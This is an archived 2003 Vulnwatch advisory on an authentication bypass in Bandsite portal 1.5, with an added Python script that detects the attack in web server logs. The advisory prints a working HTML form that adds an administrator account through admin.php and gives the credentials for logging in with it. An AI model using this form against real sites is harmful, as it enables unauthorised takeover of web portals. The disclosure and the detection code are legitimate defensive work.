Vulnwatch mailing list archives
vulnerability in Bandsite Allows Gaining Admin Access.
From: "NaSsEr .M.Sh" <nmsh_sa () yahoo com>
Date: Fri, 12 Sep 2003 03:47:15 -0700 (PDT)
Information :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author : Jelle de Vos
- Tested version : 1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
===================== nmsh.htm ==============================
<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
<TBODY>
<tr><td bgcolor=#ffffff>
</p>
<p>
<form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
===================== nmsh.htm ==============================

The admin has been added! :(
now go to this link : http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh

Vendor:
°°°°°°°
Vendor has been contacted, no reply received.

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com
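A log check for the request pattern in the advisory above, added here as an example and not part of the original post: it flags requests to admin.php that carry a `Login` parameter in the query string, marks those that POST to `section=admins`, and notes whether the same address then fetched login.php. The Apache combined log format, the function name `find_suspect_requests` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Sep/2003:10:01:02 +0000] "GET /bandwebsite/index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:10:05:40 +0000] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.0" 200 812 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:10:05:55 +0000] "GET /bandwebsite/login.php HTTP/1.0" 200 1033 "-" "Mozilla/4.0"
192.0.2.10 - - [12/Sep/2003:10:07:11 +0000] "POST /bandwebsite/admin.php?section=news HTTP/1.0" 302 0 "-" "Mozilla/4.0"
203.0.113.9 - - [12/Sep/2003:10:09:30 +0000] "GET /music/admin.php?Login=1&section=news HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_suspect_requests(log_text):
    """Return admin.php requests whose URL supplies a Login parameter."""
    hits, by_ip = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        url = urlsplit(m["target"])
        # Match on the script name only: the install directory varies per site.
        page = url.path.rsplit("/", 1)[-1].lower()
        if page == "login.php":
            # A later visit to login.php from a flagged address is worth noting.
            for earlier in by_ip.get(m["ip"], []):
                earlier["followed_by_login"] = True
        if page != "admin.php":
            continue
        # parse_qs drops the empty field produced by the leading "?&".
        params = parse_qs(url.query, keep_blank_values=True)
        if "Login" not in params:
            continue
        hit = {
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            # POST to section=admins is the request shape the posted form sends.
            "admin_add": m["method"] == "POST" and "admins" in params.get("section", []),
            "followed_by_login": False,
        }
        hits.append(hit)
        by_ip.setdefault(m["ip"], []).append(hit)
    return hits

if __name__ == "__main__":
    for h in find_suspect_requests(SAMPLE_LOG):
        print(h)
```

Any hit with `admin_add` set is a reason to compare the site's admin account list against the accounts the operator actually created.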